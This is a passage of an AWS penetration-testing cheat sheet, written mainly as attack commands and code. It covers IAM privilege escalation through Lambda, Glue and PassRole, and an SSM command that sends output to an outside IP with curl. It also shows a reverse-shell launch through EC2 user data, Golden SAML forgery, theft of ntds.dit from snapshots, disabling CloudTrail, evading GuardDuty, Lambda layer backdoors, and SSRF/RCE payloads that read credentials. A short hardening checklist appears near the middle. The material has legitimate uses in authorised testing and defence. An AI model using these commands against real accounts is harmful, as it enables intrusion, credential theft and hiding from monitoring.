target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default - $ aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2 - ``` - -- **lambda:UpdateFunctionCode** : give an attacker access to the privileges associated with the Lambda service role that is attached to that function. - ```powershell - $ aws lambda update-function-code –function-name target_function –zip-file fileb://my/lambda/code/zipped.zip - ``` - -- **glue:UpdateDevEndpoint** : give an attacker access to the privileges associated with the role attached to the specific Glue development endpoint. - ```powershell - $ aws glue –endpoint-name target_endpoint –public-key file://path/to/my/public/ssh/key.pub - ``` - - -- **iam:PassRole** + **ec2:CreateInstanceProfile**/**ec2:AddRoleToInstanceProfile** : an attacker could create a new privileged instance profile and attach it to a compromised EC2 instance that he possesses. - -- **iam:PassRole** + **ec2:RunInstance** : give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account. - ```powershell - # add ssh key - $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456 - # execute a reverse shell - $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh - ``` - -- **iam:PassRole** + **lambda:CreateFunction** + **lambda:InvokeFunction** : give a user access to the privileges associated with any Lambda service role that exists in the account. - ```powershell - $ aws lambda create-function –function-name my_function –runtime python3.6 –role arn_of_lambda_role –handler lambda_function.lambda_handler –code file://my/python/code.py - $ aws lambda invoke –function-name my_function output.txt - ``` - Example of code.py - ```python - import boto3 - def lambda_handler(event, context): - client = boto3.client('iam') - response = client.attach_user_policy( - UserName='my_username', - PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" - ) - return response - ``` - -* **iam:PassRole** + **glue:CreateDevEndpoint** : access to the privileges associated with any Glue service role that exists in the account. - ```powershell - $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub - ``` - -## AWS - Gaining AWS Console Access via API Keys - -A utility to convert your AWS CLI credentials into AWS console access. - -```powershell -$> git clone https://github.com/NetSPI/aws_consoler -$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] -2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments... -2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic. -2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established. -2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session. -2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established. -2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler. -2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated! -https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED -``` - -## AWS - Enumerate IAM permissions - -Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam) - -```powershell -git clone git@github.com:andresriancho/enumerate-iam.git -pip install -r requirements.txt -./enumerate-iam.py --access-key AKIA... --secret-key StF0q... -2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." -2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! -2019-05-10 15:58:01,537 - 21345 - [INFO] -- { - "RoleDetailList": [ - { - "Tags": [], - "AssumeRolePolicyDocument": { - "Version": "2008-10-17", - "Statement": [ - { -... -2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked! -2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! -2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! -2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! -2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! -``` - -## AWS - Mount EBS volume to EC2 Linux - -:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. - -1. Head over to EC2 –> Volumes and create a new volume of your preferred size and type. -2. Select the created volume, right click and select the "attach volume" option. -3. Select the instance from the instance text box as shown below : `attach ebs volume` -```powershell -aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone -aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device -``` -4. Now, login to your ec2 instance and list the available disks using the following command : `lsblk` -5. Check if the volume has any data using the following command : `sudo file -s /dev/xvdf` -6. Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf` -7. Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume` -8. Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/` -9. cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .` - - -## AWS - Copy EC2 using AMI Image - -First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1` - -```powershell -# create a new image for the instance-id -$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 - -# add key to AWS -$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 - -# create ec2 using the previously created AMI, use the same security group and subnet to connect easily. -$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 - -# now you can check the instance -aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 - -# If needed : edit groups -aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 - -# be a good guy, clean our instance to avoid any useless cost -aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 -aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 -``` - -## AWS - Instance Connect - Push an SSH key to EC2 instance - -```powershell -# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/ -$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" -$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds -``` - -## AWS - Lambda - Extract function's code - -```powershell -# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed -$ aws lambda list-functions --profile uploadcreds -$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds -$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds -``` - -## AWS - SSM - Command execution - -:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled. - -SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs): -* Windows Server 2008-2012 R2 AMIs published in November 2016 or later -* Windows Server 2016 and 2019 -* Amazon Linux -* Amazon Linux 2 -* Ubuntu Server 16.04 -* Ubuntu Server 18.04 -* Amazon ECS-Optimized - -```powershell -$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1 -$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds -$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds - -e.g: -$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1 -``` - -## AWS - Golden SAML Attack - -https://www.youtube.com/watch?v=5dj4vOqqGZw -https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/ - -> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements. - -Requirement: -* Token-signing private key (export from personal store using Mimikatz) -* IdP public certificate -* IdP name -* Role name (role to assume) - -```powershell -$ python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml -$ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file --u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -``` - -## AWS - Shadow Copy attack - -Prerequisite: -* EC2:CreateSnapshot -* CloudCopy - https://github.com/Static-Flow/CloudCopy - -1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions -2. Run `"Describe-Instances"` and show in list for attacker to select -3. Run `"Create-Snapshot"` on volume of selected instance -4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account -5. Load AWS CLI with Attacker Credentials -6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot -7. Ssh run `"sudo mkdir /windows"` -8. Ssh run `"sudo mount /dev/xvdf1 /windows/"` -9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"` -10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"` -11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"` -12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"` -13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"` -14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path - -## Disable CloudTrail - -```powershell -$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator -``` - -Disable monitoring of events from global services - -```powershell -$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event -``` - -Disable Cloud Trail on specific regions - -```powershell -$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west -``` - -## Cover tracks by obfuscating Cloudtrail logs and Guard Duty - -:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. - -Pacu bypass this problem by defining a custom User-Agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473) - -```python -boto3_session = boto3.session.Session() -ua = boto3_session._session.user_agent() -if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux - # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that... - self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...') -``` - -## DynamoDB -> Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second. - -* list tables -```bash -$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables - -{ - "TableNames": [ - "users" - ] -} -``` - -* enumerate table content -```bash -$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]' - -{ - "password": { - "S": "Management@#1@#" - }, - "username": { - "S": "Mgmt" - } -} -``` - -## Security checks - -Security checks from [DenizParlak/Zeus: AWS Auditing & Hardening Tool](https://github.com/DenizParlak/Zeus) - -* Identity and Access Management - * Avoid the use of the "root" account - * Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password - * Ensure credentials unused for 90 days or greater are disabled - * Ensure access keys are rotated every 90 days or less - * Ensure IAM password policy requires at least one uppercase letter - * Ensure IAM password policy requires at least one lowercase letter - * Ensure IAM password policy requires at least one symbol - * Ensure IAM password policy requires at least one number - * Ensure IAM password policy requires minimum length of 14 or greater - * Ensure no root account access key exists - * Ensure MFA is enabled for the "root" account - * Ensure security questions are registered in the AWS account - * Ensure IAM policies are attached only to groups or role - * Enable detailed billing - * Maintain current contact details - * Ensure security contact information is registered - * Ensure IAM instance roles are used for AWS resource access from instances -* Logging - * Ensure CloudTrail is enabled in all regions - * Ensure CloudTrail log file validation is enabled - * Ensure the S3 bucket CloudTrail logs to is not publicly accessible - * Ensure CloudTrail trails are integrated with CloudWatch Logs - * Ensure AWS Config is enabled in all regions - * Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket - * Ensure CloudTrail logs are encrypted at rest using KMS CMKs - * Ensure rotation for customer created CMKs is enabled -* Networking - * Ensure no security groups allow ingress from 0.0.0.0/0 to port 22 - * Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389 - * Ensure VPC flow logging is enabled in all VPC - * Ensure the default security group of every VPC restricts all traffic -* Monitoring - * Ensure a log metric filter and alarm exist for unauthorized API calls - * Ensure a log metric filter and alarm exist for Management Consolesign-in without MFA - * Ensure a log metric filter and alarm exist for usage of "root" account - * Ensure a log metric filter and alarm exist for IAM policy changes - * Ensure a log metric filter and alarm exist for CloudTrail configuration changes - * Ensure a log metric filter and alarm exist for AWS Management Console authentication failures - * Ensure a log metric filter and alarm exist for disabling or scheduled deletion of customer created CMKs - * Ensure a log metric filter and alarm exist for S3 bucket policy changes - * Ensure a log metric filter and alarm exist for AWS Config configuration changes - * Ensure a log metric filter and alarm exist for security group changes - * Ensure a log metric filter and alarm exist for changes to NetworkAccess Control Lists (NACL) - * Ensure a log metric filter and alarm exist for changes to network gateways - * Ensure a log metric filter and alarm exist for route table changes - * Ensure a log metric filter and alarm exist for VPC changes - -## AWSome Pentesting Cheatsheet - -* Created by pop3ret - -## Searching for open buckets - -``` -https://buckets.grayhatwarfare.com/ -``` - -## ARN - -A number to identify an object in AWS - -Example - -``` -arn:aws:iam:100:user/admin -``` - -1. Field -> ARN -2. Field -> Type, most of time will be AWS -3. Field -> service, in this case IAM -4. Field -> User ID -5. Field -> entity identifier - -## IAM -* It's assumed that we have gain access to the AWS Credentials -* We can see if we have permissions using [Amazon's policy simulator](**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**) -* Always look for policies and roles with the * symbol. -* See which user do not have MFA enabled -* User enumeration in IAM Panel and group enumeration -* We can also enumerate roles from the same interface -* Root user is super admin - -## Configure AWS cli - -``` -aws configure -``` - -Or configure it using a profile - -``` -aws configure --profile example_name -``` - -The credential file is located in `~/.aws/credentials` - -## Listing IAM access Keys - -``` -aws iam list-access-keys -``` - -## 1. Enumerating IAM users - -### Checking credentials for the user - -``` -aws sts get-caller-identity -``` - -### Listing IAM Users - -``` -aws iam list-users -``` - -### Listing the IAM groups that the specified IAM user belongs to - -``` -aws iam list-groups-for-user --user-name user-name -``` - -### Listing all manages policies that are attached to the specified IAM user - -``` -aws iam list-attached-user-policies --user-name user-name -``` - -### Listing the names of the inline policies embedded in the specified IAM user - -``` -aws iam list-user-policies --user-name user-name -``` - -## 2. Enumerating Groups IAM - -### Listing IAM Groups - -``` -aws iam list-groups -``` - -### Listing all managed policies that are attached to the specified IAM Group - -``` -aws iam list-attached-group-policies --group-name group-name -``` - -### Listing the names of the inline policies embedded in the specified IAM Group - -``` -aws iam list-group-policies --group-name group name -``` - -## 3. Enumeratig Roles - -### Listing IAM Roles - -``` -aws iam list-roles -``` - -### Listsing all managed policies that are attached to the specified IAM role - -``` -aws iam list-attached-role-policies --role-name role-name -``` - -### Listing the names of the inline policies embedded in the specified IAM role - -``` -aws iam list-role-policies --role-name role-name -``` - -## 4. Enumerating Policies - -### Listing of IAM Policies - -``` -aws iam list-policies -``` - -### Retrieving information about the specified managed policy - -``` -aws iam get-policy --policy-arn policy-arn -``` - -### Listing information about the versions of the specified manages policy - -``` -aws iam list-policy-versions --policy-arn policy-arn -``` - -### Retrieving information about the specific version of the specified managed policy - -``` -aws iam get-policy-version --policy-arn policy-arn --version-id version-id -``` - -### Retrieving the specified inline policy document that is embedded on the specified IAM user / group / role - -``` -aws iam get-user-policy --user-name user-name --policy-name policy-name - -aws iam get-group-policy --group-name group-name --policy-name policy-name - -aws iam get-role-policy --role-name role-name --policy-name policy-name -``` - -## 5. Exploitation Scenario - -### General Guidelines -* AWS token compromised (Developer machine, phishing etc) and we as attackers will gonna use it. - -### Enumerating the owner of the key and initial compromise - -``` -aws sts get-caller-identity -``` - -Or specifing a profile - -``` -aws sts get-caller-identity --profile example_name -``` - -If you have the password of the root account instead of key, log in - -``` -https://signin.aws.amazon.com/console -``` - -Or use the IAM in case the account is not the root - -``` -https://account-id-here.signin.aws.amazon.com/console -``` - -*The account id can be cathered using the sts get caller command.* - -### Privilege Escalation -* Privilege escalation on AWS is based on misconfigurations, if we have more permissions than necessary, its possible to obtain higher privileges. - -#### Study Case -* A user was compromised with the *List Policy* and *Put User Policy* permissions, an attacker could leverage this *Put User* privilege to add an inline administrator to itself, making it administrator of the instance. - -##### Exploitation -1. Getting the IAM user - -``` -aws sts get-caller-identity -``` - -2. Listing policies attached to an user - -``` -aws iam list-attached-user-policies --user-name example_name -- profile example_profile -``` - -3. Retrieving informations about an specific policy - -``` -aws iam get-policy --policy-arn policy_arn -``` - -If there are more than one version of the policy, we can also list them - -``` -aws iam list-policy-versions --policy-arn policy_arn -``` - -Now we can finally retrieve the contents of the policy - -``` -aws iam get-policy-version --policy-arn example_arn --version-id id_example -``` - -*It's important to use the command above to chech the information about the default policy* - -4. Escalation - -If we have the PutUserPolicy is enabled, we can add an inline administrator policy to our user. - -Administrator policy example - -```json -{ - "Version": "2021-10-17", - "Statement" : [ - { - "Effect":"Allow", - "Action": [ - "*" - ], - "Resource":[ - "*" - ] - } - ] -} -``` - -### Attaching this policy into our user - -``` -aws iam put-user-policy --user-name example_username --policy-name example_name --policy-document file://AdminPolicy.json -``` - -### Listing inline policies of our user - -``` -aws iam list-user-policies --user-name example_name -``` - -### Listing a restricted resource (Example S3) - -``` -aws s3 ls --profile example_profile -``` - -### Interesting Permissions - -* iam:AttachUserPolicy -> Attach a policy to a user -* iam:AttachGroupPolicy -> Attach a policy to a group -* iam:AttachRolePolicy -> Attach a policy to a role -* iam:CreateAccessKey -> Creates a new access key -* iam:CreateLoginProfile -> Creates a new login profile -* iam:UpdateLoginProfile -> Update an existing login profile -* iam:PassRole and ec2:RunInstances -> Creates an EC2 instance with an existing instance profile -* iam:PuserUserPolicy -> Create/Update an inline policy -* iam:PutGroupPolicy -> Create/Update an inline policy for a group -* iam:PutRolePolicy -> Create/Update an inline policy for a role -* iam:AddUserToGroup -> Add an user to a group -* iam:UpdateAssumeRolePolicy and sts:AssumeRole -> Update the AssumeRolePolicyDocument of a role -* iam:PassRole,lambda:CreateFunction and lambda:InvokeFunction -> Pass a role to a new lambda function and invoke it -* lambda:UpdateFunctionCode -> Update the code of an existing lambda function - -### Persistence & Backdooring -* Suppose we have two users, the user A has permissions to create Access Keys to user B, this misconfig allows us to create an access key for user B and persist our access. - -#### Creating a new access key for another user - -``` -aws iam create-access-key --username example_username -``` - -#### Configuring AWS cli for the new user - -``` -aws configure --profile example_profile -``` - -*Remember, an user can have the maximum of 2 access keys*. - -#### Testing the credential - -``` -aws sts get-caller-identity --profile example_profile -``` - -#### Accessing more credentials -* It's possible to assume other roles with the sts:AssumeRole permission (Example: An user doesn't have access to an s3 instance, but it has this permission, we can easily assume other roles if we are in the trust relashionship, increasing our access in the instance) - -##### Listing managed policies attached to an user - -``` -aws iam list-attached-user-policies --user-name example_name -``` - -##### Retrieving information about an specific policy - -``` -aws iam get-policy --policy-arn ARN -``` - -##### Listing information about the version of the policy - -``` -aws iam list-policy-versions --policy-arn ARN -``` - -##### Retrieving information about an specific version - -``` -aws iam get-policy-version --policy-arn policy_arn --version-id ID -``` - -##### Listing IAM roles - -``` -aws iam list-roles -``` - -##### Listing trust relashionship between role and user (Which roles we can assume) - -``` -aws iam get-role --role-name role_name -``` - -##### Listing all managed policies attached to the specific IAM role - -``` -aws iam liast-attached-role-policies --role-name role_name -``` - -##### Retrieving information about the specified version of the policy - -``` -aws iam get-policy-version --policy-arn policy_arn --version-id ID -``` - -##### Getting temporary credentials for the role - -``` -aws sts assume-role --role-arn role_arn --role-session-name session_name -``` - -##### Configuring AWS cli with newer credentials (On Linux) - -``` -export AWS_ACCESS_KEY_ID -export AWS_SECRET_KEY -export AWS_SESSION_TOKEN -``` - -##### Getting information about the temporary credential - -``` -aws sts get-caller-identity -``` - -## S3 - Simple Storage System - -* Storage system that allow users to store and retrieve data. -* List,Get,Put and Delete operations can be performed on the objects of the bucket -* Buckets are global, meaning that they are available to all regions -* It's possible to bruteforce the bucket name and region in the URL -* Its possible to apply ACL's to bucket and object level and bucket policies for bucket level -* There is also time limited URL's and identity based policies -* Identity policies are enumerated using IAM commands - -## Enumeration - -### Listing all buckets in aws account - -``` -aws s3api list-buckets -``` - -### Getting information about a specific bucket - -``` -aws s3api get-bucket-acl --bucket name -``` - -### Getting information about a specific bucket policy - -``` -aws s3api get-bucket-policy --bucket name -``` - -### Getting the Public Access Block configuration for an S3 bucket - -``` -aws s3api get-public-access-block --bucket name -``` - -### Listing all objects in a specific bucket - -``` -aws s3api list-objects --bucket name -``` - -### Getting ACL information about specific object - -``` -aws s3api get-object-acl --bucket-name name --key object_name -``` - -## Data Exfiltration -* It's possible to brute-force files in the bucket -* If the bucket is misconfigured, we can read data through web browser, cli/api or time-based URL. - -### Public Access - -* Just enter the URL in the browser - -``` -https://bucket-name.region.amazonaws.com/secret.txt -``` - -### Authenticated User - -``` -aws s3api get-object --bucket name --key object-name download-file-location -``` - -### Time-Based Url - -* Generate a time based url for an object -* Userful if the object is not public - -``` -aws s3 presign s3://bucket-name/object-name --expires-in 605000 -``` - -## Lambda & API Gateway -* Serverless event driven platform -* Runs code in response to events and automatically manages computing resources required by that code -* Can trigger from other AWS services or call directly from the API Gateway -* A lambda function is a piece of code that is executed whenever is triggered by an event from an event source -* API Gateway is an AWS service for creating, publishing, maintaining, monitoring and securing REST, HTTP and WebSocket API -* API Gateway can be used to trigger lambda functions in a synchronous (api gateway), asynchronous (event) or stream (Poll Based) way. -* If we found a lambda function that access an S3 (Example) its possible to change its code and gain access to the files. -* If API Gateway is used, we can enumerate the API to see how its possible to invoke the lambda function (Craft the URL). - -## Enumeration - -### Listing All lambda functions - -``` -aws lambda list-functions -``` - -### Listing information about a specific lambda function - -``` -aws lambda get-function --function-name function_name -``` - -* *This command enables us to download the source code of the lambda function* - -### Listing policy information about the function - -``` -aws lambda get-policy --function-name function_name -``` - -* We can get informations like who can execute this functions, ID and other informations with this command - -### Listing the event source mapping information about a lambda function - -``` -aws lambda list-event-source-mappings --function-name function_name -``` - -### Listing Lambda Layers (Depedencies) - -``` -aws lambda list-layers -``` - -### Listing full information about a lambda layer - -``` -aws lambda get-layer-version --layer-name name --version-number version_number -``` - -### Listing Rest API'S - -``` -aws apigateway get-rest-apis -``` - -### Listing information about a specific API - -``` -aws apigateway get-rest-api --rest-api-id ID -``` - -### Listing information about endpoints - -``` -aws apigateway get-resources --rest-api-id ID -``` - -### Listing information about a specific endpoint - -``` -aws apigateway get-resource --rest-api-id ID --resource-id ID -``` - -### Listing method information for the endpoint - -``` -aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method -``` - -* Test various methods to see if the API supports it. - -### Listing all versions of a rest api - -``` -aws apigateway get-stages --rest-api-id ID -``` - -### Getting informatin about a specific version - -``` -aws apigateway get-stage --res-api-id ID --stage-name NAME -``` - -### Listing API KEYS - -``` -aws apigateway get-api-keys --include-values -``` - -### Getting information about a specific API Key - -``` -aws apigateway get-api-key --api-key KEY -``` - -## Initial Access - -* Its possible to get RCE through API Gateway if it executes commands. -* If you can execute commands, there is a way to retrieve keys from the API Gateway, just use `env` , configure `aws cli` and proceed with the exploitation. - -## Credential Access - -Getting credentials from Lambda can be done in 2 ways - -1. Keys in the source code -2. Keys in the enviroment variables - -These keys can be gathered using SSRF, RCE and so on. - -### Getting credentials using RCE - -``` -https://apigateway/prod/system?cmd=env -``` - -### Getting credentials using SSRF - -``` -https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/next -``` - -### Getting credentials using SSRF and wrappers - -``` -https://apigateway/prod/system?cmd=file:///proc/self/environ -``` - -### Getting credentials from lambda enviroment variables (cli) - -``` -aws lambda get-function --function-name NAME -``` - -* It's important to enumerate the functions first with `aws lambda list-functions` - -## Persistence -* If the user has sufficient rights in the lambda function, its possible to download the source code, add a backdoor to it and upload. Everytime the lambda executes, the malicious code will also execute. -* Always try to update the code of layers (depedencies) instead of the actual lambda code, this way our backdoor will be difficult to detect. - -### Checking which user is executing - -``` -aws sts get-caller-identity -``` - -### Checking all managed policies attached to the user - -``` -aws iam list-attached-user-policies --user-name user_name -``` - -### Checking informations about a specific policy - -``` -aws iam get-policy-version --policy-arn arn --version-id ID -``` - -### Listing all lambda functions - -``` -aws lambda list-functions --region region -``` - -### Listing information about the specified lambda - -``` -aws lambda get-function --function-name name -``` - -* Download and analyze the codes - -### Listing policy information about the specific lambda function - -``` -aws lambda get-policy --function-name name --profile profile --region region -``` - -* We can grab informations like id, who can invoke and other details with this command (Helps to build the query to execute the lambda function). - -### Listing Rest API'S - -``` -aws apigateway get-rest-apis -``` - -### Listing information about a specific API - -``` -aws apigateway get-rest-api --rest-api-id ID -``` - -### Listing information about endpoints - -``` -aws apigateway get-resources --rest-api-id ID -``` - -### Listing information about a specific endpoint - -``` -aws apigateway get-resource --rest-api-id ID --resource-id ID -``` - -### Listing method information for the endpoint - -``` -aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method -``` - -* Test various methods to see if the API supports it. - -### Listing all versions of a rest api - -``` -aws apigateway get-stages --rest-api-id ID -``` - -### Getting informatin about a specific version - -``` -aws apigateway get-stage --res-api-id ID --stage-name NAME -``` - -### Uploading the backdoor code to aws lambda function - -``` -aws lambda update-function-code --function-name function --zip-file fileb://my-function.zip -``` - -### Invoke the Function - -``` -curl https://uj3948ie.execute-api.us-east-2.amazonaws.com/default/EXAMPLE -``` - -Where - -1. API-ID -> uj3948ie -2. Region -> us-east-2 -3. Resource (Endpoint) -> EXAMPLE -4. Method -> Get -5. Stage (Version) -> default -6. API-Key -> None - -*All these details are gathered during the enumeration.* - -## Privilege Escalation -* If we have a user with PassRole and CreateFunction roles and also AttachRolePolicy role in a Lambda Function, its possible to create a function with a code that changes the lambda role to admin then the user to Administrator. - -### Create a lambda function and attach a role to it - -``` -aws lambda create-function --function-name my-function --runtime python3.7 --zip-file fileb://my-function.zip --handler my-function.handler --role ARN --region region -``` - -* Inside the function's code, we will add the administrator permission to the role and to the user - -#### Example code to add the permissions - -```python -import boto3 -import json - -def handler(event,context) - iam = boto3.client("iam") - iam.attach.role.policy(RoleName="name",PolicyArn="arn",) - iam.attach.user.policy(UserName="name",PolicyArn="arn",) - return { - 'statusCode':200 - 'body':json.dumps("Pwned") - } -``` - -### Invoke a lambda function - -``` -aws lambda invoke --function-name name response.json --region region -``` - -### Listing managed policies to see if the change worked - -``` -aws iam list-attached-user-policies --user-name user_name -``` - -## AWS Secret Manager - -* AWS Service that encrypts and store secrets -* Transparently decrypts and return in plaintext -* KMS used to store keys (AWS Key and Customer Managed Key) -* Asymmetric and Symmetric keys can be created using KMS - - -## Enumeration - -### Listing all secrets stored by Secret Manager - -``` -aws secretsmanager list-secrets -``` - -### Listing information about a specific secret - -``` -aws secretsmanager describe-secret --secret-id name -``` - -### Getting policies attached to the specified secret - -``` -aws secretsmanager get-resource-policy --secret-id ID -``` - -### Listing keys in KMS - -``` -aws kms list-keys -``` - -### Listing information about a specific key - -``` -aws kms describe-key --key-id ID -``` - -### Listing policies attached to a specific key - -``` -aws kms list-key-policies --key-id ID -``` - -### Getting full information about a policy - -* Shows who can access the keys - -``` -aws kms get-key-policy --policy-name name --key-id ID -``` - -## Credential Exfiltration - -* If the user has access to Secret Manager, it can decrypt the secrets using the web, cli or API - -### Listing policies attached to an user - -``` -aws iam list-attached-user-policies --user-name name -``` - -### Retrieving information about a specific version of policy - -* Here we can see the permissions - -``` -aws iam get-policy-version --policy-arn arn --version-id id -``` - -### Listing all secrets stored by Secret Manager - -``` -aws secretsmanager list-secrets -``` - -### Listing information about a specific secret - -* Here we get the secret Key Id to descript the secret - -``` -aws secretsmanager describe-secret --secret-id name -``` - -### Getting resource-based policy attached to an specific secret - -``` -aws secretsmanager get-resource-policy --secret-id ID -``` - -### Getting the secret value - -* Retrieves the actual value - -``` -aws secretsmanager get-secret-value --secret-id ID -``` - -### KMS - -* If we compromised as an example an S3 with an encrypted file, we can decrypt it using the keys stored in KMS. - -#### Listing an specific key - -``` -aws kms describe-key --key-id id -``` - -#### Listing policies attached to an specified key - -* Here we can see who can access the key, the description of it and so on - -``` -aws kms list-key-policies --key-id ID -``` - -#### Listing full information about a policy - -* Run the previous command in all keys to see who can access it - -``` -aws kms get-key-policy --policy-name name --key-id ID -``` - -#### Decrypt the secret using the key - -* There is no need to specificy the key information because this information is embbeded in the encrypted file - -``` -aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext -``` - -## Containers - -Divided into three categories - -* Registry -> Secure place to store container images (ECR) -* Orchestration -> Configure when and where the containters run (ECS,EKS) -* Compute -> Use to do computing related tasks (EC2, Fargate) -* Its possible to create a backdoor image and add to a EKS 